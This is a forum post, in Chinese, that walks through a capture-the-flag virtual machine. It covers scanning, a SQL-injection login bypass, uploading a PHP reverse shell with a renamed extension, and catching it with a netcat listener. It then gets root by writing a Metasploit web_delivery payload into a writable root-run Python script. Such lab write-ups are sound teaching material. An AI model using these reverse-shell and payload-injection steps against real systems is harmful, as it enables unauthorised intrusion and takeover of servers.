用户
搜索
  • TA的每日心情
    郁闷
    2020-7-29 16:16
  • 签到天数: 2 天

    连续签到: 1 天

    [LV.1]初来乍到

    i春秋-脚本小子

    Rank: 2

    2

    主题

    9

    帖子

    93

    魔法币
    收听
    1
    粉丝
    0
    注册时间
    2018-4-17
    发表于 2020-7-30 17:49:40 32590
    本帖最后由 heikuzi44 于 2020-7-30 18:28 编辑

    前言之碎碎念
    表哥们可直接跳到正文

    这个虚拟机真的是有毒,设置了好久才能打开。
    一开始它本来的设置是桥接,我改成nat之后,启动到一半之后就不能卡住了, 重启依然是卡在那里(忘记截图了)。
    转到virtualbox打开,也是报错误,无奈,又回到vmware,再重启居然好了,我滴个天鹅!(重启大法好,不行就多重启几次哈哈哈)
    然后更改网卡驱动,开机按e,进入 这个界面
    1.png
    把下面勾红圈的地方改成 rw signie init=/bin/bash
    2.png
    之后按Ctrl+X就可以进入命令行模式
    本来想输入ip a查看ip信息的,天杀的i就是输入不了,好像把它当作参数了还是咋滴,比如说输入ip a就变成了p a
    3.png
    4.png
    最后很无赖地先按下大写键,然后shift+命令就可以输入小写的命令了。
    故此,查看ip a 发现网卡名称是ens33
    5.png
    但是键盘对应的键似乎对于这个虚拟机来说是乱的,我探索了好半天才知道按下大写键的前提下,CTRL+7键对应的才是/键。
    进入vim /etc/network/interfaces(斜杠/的输入也有问题,见上),把网卡名称改成ens33就ok了。
    改画圈的那个为ens33,然后重启就可以了
    6.png
    以上都是废话

    正文

    1.信息探测

    nmap扫描,探查到ip为192.168.1.7
    7.png
    再扫描详细信息
    8.png
    开了80端口,访问之,一个正常的页面,找了没找出啥东西

    2.目录扫描


    目录扫描之
    9.png
    10.png
    js文件看了貌似没啥用(也可能是我比较菜),其他的也不能利用
    /masteradmin是一个目录,扫描出来颜色跟文件是有差异的,所以我们再扫/masteradmin
    11.png
    12.png
    访问之:
    13.png
    登陆框存在注入,万能密码一下子就进去了,但是还是假装跑一下后台密码,说不定用到呢。
    14.png
    15.png

    登录进去之后:
    16.png
    应该是文件上传了。

    3.文件上传getshell


    17.png
    不让上传php结尾的,指定ceng结尾的,提示信息好暗,差点忽略掉。(截图我就没看出来……)
    百度一个php的回连马,burpsuite截包,改后缀为ceng,上传(这步的截图没截到)
    本地监听:nc -lvp 1234,上传之后,访问就回连了。
    18.png
    运行下面的命令得到一个交互式的shell:
    [AppleScript] 纯文本查看 复制代码
    python3 -c 'import pty;pty.spawn("/bin/bash")'
    19.png
    禁止回显命令:stty raw -echo,这样自己输入的命令就不会累赘显示了
    20.png
    枚举过程中,发现一个名为cengover的用户。根据前期跑出的密码,将用户从www-data切换到cengover:
    21.png

    4.提权

    先下载一个pspy脚本,至于这个脚本是干啥的:
    22.png
    31.png
    23.png

    运行之:
    24.png
    得到一些隐藏的进程,其中一个为带有md5check.py的python脚本:
    25.png
    检查该文件的权限,发现是可读可写的:
    26.png
    另起一个窗口进入msfconsole:
    [AppleScript] 纯文本查看 复制代码
    use exploit/multi/script/web_delivery
    set lhost 192.168.1.128
    set srvport 8081
    exploit

    27.png
    将生成的payload写入到md5check.py中:
    28.png
    这时之前msfconsole监听的进程已经有回连了(这时已经是root权限)
    29.png
    查看root.txt
    30.png
    完成!


    写的不错
    使用道具 举报 回复
    抢个楼,看看
    使用道具 举报 回复
    学习了!表哥
    末心网络安全团队
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册